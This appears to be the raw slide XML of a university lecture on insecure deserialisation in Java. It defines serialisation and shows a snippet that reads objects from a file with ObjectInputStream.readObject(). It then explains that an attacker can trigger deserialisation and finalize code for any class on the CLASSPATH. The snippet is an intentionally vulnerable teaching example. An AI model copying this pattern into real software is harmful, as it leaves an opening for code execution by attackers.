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10"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="567" r:id="rId2"/>
    <p:sldId id="558" r:id="rId3"/>
    <p:sldId id="435" r:id="rId4"/>
    <p:sldId id="559" r:id="rId5"/>
    <p:sldId id="489" r:id="rId6"/>
    <p:sldId id="477" r:id="rId7"/>
    <p:sldId id="478" r:id="rId8"/>
    <p:sldId id="488" r:id="rId9"/>
  </p:sldIdLst>
  <p:sldSz cx="10080625" cy="7559675"/>
  <p:notesSz cx="7772400" cy="10058400"/>
  <p:defaultTextStyle>
    <a:defPPr>
      <a:defRPr lang="en-GB"/>
    </a:defPPr>
    <a:lvl1pPr algn="l" defTabSz="4921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742950" indent="-285750" algn="l" defTabSz="4921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1143000" indent="-228600" algn="l" defTabSz="4921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600200" indent="-228600" algn="l" defTabSz="4921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2057400" indent="-228600" algn="l" defTabSz="4921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8000"/>
    <a:srgbClr val="FF99FF"/>
    <a:srgbClr val="99FF66"/>
    <a:srgbClr val="66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0" autoAdjust="0"/>
    <p:restoredTop sz="94660"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="75" d="100"/>
          <a:sy n="75" d="100"/>
        </p:scale>
        <p:origin x="163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D558C039-A72E-AEC2-B524-FFB07DF2D39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806BE1F-FC2B-FAF6-46B0-D1EFC266B44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A5EB87D-31DE-CE95-8463-4686526C0E7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Arial Rounded MT Bold" panose="020F0704030504030204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398012A-24C5-066A-DF60-327DA0845E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Arial Rounded MT Bold" panose="020F0704030504030204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F6CC3A3-7C42-386F-EBA7-2F6E9BD0682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Arial Rounded MT Bold" panose="020F0704030504030204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6CC1197-27D6-AFA7-7F8D-9127E613F3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Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{C528A183-1DE9-4FE8-B75E-0BFB409A617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Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr marL="742950" indent="-28575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3EB5466-E1F3-9149-8836-38FBC4EFB8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7C9BDB-B381-4FFE-93CE-F36673CAB9B5}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" sz="1400" smtClean="0"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL" sz="14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32A32B31-289C-FFD6-A874-C9FFCEDD25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8AFF2BB6-D912-C3EF-0183-E6A982621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7375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501074-D37D-39EC-C5A3-EEBA9BCAF8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88B48-FB71-49D9-8DD5-D84F27479BB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85917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AE8519-8C4E-967F-4143-9C7778E4CBB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70789-C4F8-4BCF-B9A2-E0E34052E27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734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187549"/>
            <a:ext cx="4457700" cy="556885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187549"/>
            <a:ext cx="4459287" cy="556885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73D162-F5CB-0B59-80F1-2080C9CAB14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2E3E2-2373-4EBC-83EB-80FA554166D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9011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8127284-CACC-F234-3463-050ED4EA5C7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8BE8-000D-40C1-8DA3-275AD2DED71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4503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95C809-A684-13E8-A924-F6E4182FAE4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17D23-A707-4697-87B2-B622CB9539E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0752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7C70F29-E6FC-979B-62A1-110432660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92163" y="309563"/>
            <a:ext cx="8496300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3F983AB-FA2B-6362-3FA7-DCA67B67B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92163" y="1116013"/>
            <a:ext cx="8496300" cy="564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67B6EBC-4135-6182-9F62-1C76C5FE45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</a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{A70B3CD6-4400-4E85-BBAD-66D4C774F8D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hf hdr="0" ftr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="ctr" defTabSz="492125" rtl="0" eaLnBrk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ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr algn="ctr" defTabSz="492125" rtl="0" eaLnBrk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ea typeface="DejaVu Sans" charset="0"/>
          <a:cs typeface="DejaVu Sans" charset="0"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr algn="ctr" defTabSz="492125" rtl="0" eaLnBrk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ea typeface="DejaVu Sans" charset="0"/>
          <a:cs typeface="DejaVu Sans" charset="0"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr algn="ctr" defTabSz="492125" rtl="0" eaLnBrk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ea typeface="DejaVu Sans" charset="0"/>
          <a:cs typeface="DejaVu Sans" charset="0"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr algn="ctr" defTabSz="492125" rtl="0" eaLnBrk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ea typeface="DejaVu Sans" charset="0"/>
          <a:cs typeface="DejaVu Sans" charset="0"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="2514600" indent="-228600" algn="ctr" defTabSz="492125" rtl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ea typeface="DejaVu Sans" charset="0"/>
          <a:cs typeface="DejaVu Sans" charset="0"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="2971800" indent="-228600" algn="ctr" defTabSz="492125" rtl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ea typeface="DejaVu Sans" charset="0"/>
          <a:cs typeface="DejaVu Sans" charset="0"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="3429000" indent="-228600" algn="ctr" defTabSz="492125" rtl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ea typeface="DejaVu Sans" charset="0"/>
          <a:cs typeface="DejaVu Sans" charset="0"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="3886200" indent="-228600" algn="ctr" defTabSz="492125" rtl="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="11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ea typeface="DejaVu Sans" charset="0"/>
          <a:cs typeface="DejaVu Sans" charset="0"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="342900" indent="-342900" algn="l" defTabSz="492125" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="11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000">
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="742950" indent="-285750" algn="l" defTabSz="492125" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="11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Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1143000" indent="-228600" algn="l" defTabSz="492125" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="11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000">
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1600200" indent="-228600" algn="l" defTabSz="492125" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="11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Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="2057400" indent="-228600" algn="l" defTabSz="492125" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="11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Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="2514600" indent="-228600" algn="l" defTabSz="492125" rtl="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="11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92125" rtl="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="11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92125" rtl="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="11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92125" rtl="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="11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4FD4E17-4B56-DC80-443B-6C27281E3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defTabSz="4921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defTabSz="4921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defTabSz="4921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defTabSz="4921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Software Security</a:t>
            </a:r>
          </a:p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Insecure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="32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Deserialisation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" alt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400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p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Erik Poll</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="11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DA3D9D36-DF4C-D9D7-AEA7-5513F6EDE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6372225"/>
            <a:ext cx="3643313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Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E8EB262-9E56-91BF-6821-750613F5E2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930B4E68-2A73-4D40-85B1-BCC38B71DC4B}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>1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82635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C2CAA-3D0F-FDC7-4A62-E7CB065AA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542469">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3086" dirty="0"/>
              <a:t>(De)serialisation  </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2646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EAB0B-C6AB-56D5-EDFC-754FECF0B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239838"/>
            <a:ext cx="8555037" cy="5648325"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="542469">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Serialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> (aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>marshalling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pickling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" defTabSz="542469">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="661"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>turning a data structure or object into sequence of bytes or string</a:t>
            </a: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endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000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endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000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endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000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r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deserialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> (aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unmarshalling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unpickling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" defTabSz="542469">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="661"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>turning a sequence of bytes back into a data structure or object </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1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endParaRPr lang="en-GB" sz="1800" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1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r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Typically uses?</a:t>
            </a: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r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	storing objects on disk,  transferring objects over network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="542469">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="661"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1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endParaRPr lang="en-GB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2164" name="Tijdelijke aanduiding voor dianummer 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{341B0781-9964-B226-EA61-61C9DC9521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9097D16C-212F-431B-BE46-E7162F9AF926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2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A pink elephant with a baby elephant&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97125416-AB23-9B4F-1F8D-C3729A6DC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0" y="2627709"/>
            <a:ext cx="1587180" cy="1060765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675D93-44A4-3564-A7A5-A3799985B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199421"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3145204" y="3032361"/>
          <a:ext cx="3957318" cy="2514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9851">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1444519983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2498676224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1983379133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578866811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766186555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1219095493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2577236908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4091211447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907624261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2090460784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912072379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59626398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846367688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522050838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072043552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512283201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3216510485"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="219851">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="425119622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900" dirty="0"/>
                        <a:t>e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/>
                        <a:t>i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k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613616"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="A pink elephant with a baby elephant&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC4BB3DD-D0D6-765E-9B35-1B1A09AAB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864" y="2627709"/>
            <a:ext cx="1587180" cy="1060765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F1157609-711F-F560-3F42-1281803A5B5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2159992" y="2915775"/>
            <a:ext cx="776443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92125" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0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effectLst/>
              <a:latin typeface="Comic Sans MS" pitchFamily="64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6A64E12-36A9-5126-BC96-13A19CED1CB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7227888" y="2897940"/>
            <a:ext cx="776443" cy="484632"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow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92125" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0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effectLst/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2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C2CAA-3D0F-FDC7-4A62-E7CB065AA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542469">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3086" dirty="0" err="1"/>
              <a:t>Deserialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3086" dirty="0"/>
              <a:t> attacks in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2646" dirty="0"/>
              <a:t> Java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EAB0B-C6AB-56D5-EDFC-754FECF0B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239838"/>
            <a:ext cx="8555037" cy="5648325"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="542469">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Code to read </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Student</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> objects from a file    </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>FileInputStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B060602020203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</a:rPr>
              <a:t>fileIn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>FileInputStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("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/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tmp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/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students.ser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>") </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 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        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ObjectInputStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B060602020203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</a:rPr>
              <a:t>objectIn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ObjectInputStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>fileIn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>);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        s = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(Student) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>objectIn.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readObject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(); // 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deserialise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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34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Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cast</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="240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 defTabSz="542469">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="661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If file contains serialised </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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Student</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> objects, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1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readObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> will execute the deserialization code from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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Student.java</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="7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r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How would you attack this? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="542469">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="661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If file contains other objects, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1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readObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> will execute the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deserialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> code for that class</a:t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lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>So: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attacker can execute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deserialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> code for any class on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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CLASSPATH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="542469">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="661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If the object s is later discarded as garbage, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> because the cast fails,  the garbage collector will invoke its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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finalize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> methods</a:t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lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>So: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attacker can execute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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finalize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> method for any class on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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CLASSPATH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="818954" lvl="1" indent="-314982" defTabSz="542469">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="661"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1764" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1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endParaRPr lang="en-GB" sz="1984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defTabSz="542469"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endParaRPr lang="en-GB" sz="1984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2164" name="Tijdelijke aanduiding voor dianummer 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
